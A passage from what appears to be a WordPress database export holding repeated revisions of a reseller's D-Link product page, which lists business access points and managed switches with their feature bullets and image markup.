Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2018-12-20 14:56:04','2018-12-20 06:56:04','',1480,'https://bintara.com.my/blog/2018/12/20/1480-revision-v1/',0,'revision','',0),(2659,1,'2018-12-20 14:56:24','2018-12-20 06:56:24','<h3>D - Link Business Solution Product </h3>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]</p>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>- Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>- Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>- Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>- Weather-proof design (IPX6) built to withstand harsh environments</p><p>- Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>- Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>- Provides WLAN partitioning for deployments such as wireless hot spots</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>â€¢ Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>â€¢ Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>â€¢ Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>â€¢ Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>â€¢ Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>â€¢ Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>â€¢ RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>â€¢ Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2018-12-20 14:56:24','2018-12-20 06:56:24','',1480,'https://bintara.com.my/blog/2018/12/20/1480-revision-v1/',0,'revision','',0),(2660,1,'2018-12-20 14:57:37','2018-12-20 06:57:37','<h3>D - Link Business Solution Product </h3>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]</p>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>- Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>- Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>- Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>- Weather-proof design (IPX6) built to withstand harsh environments</p><p>- Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>- Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>- Provides WLAN partitioning for deployments such as wireless hot spots</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>â€¢ Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>â€¢ Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>â€¢ Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>â€¢ Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>â€¢ Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>â€¢ Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>â€¢ RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>â€¢ Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" 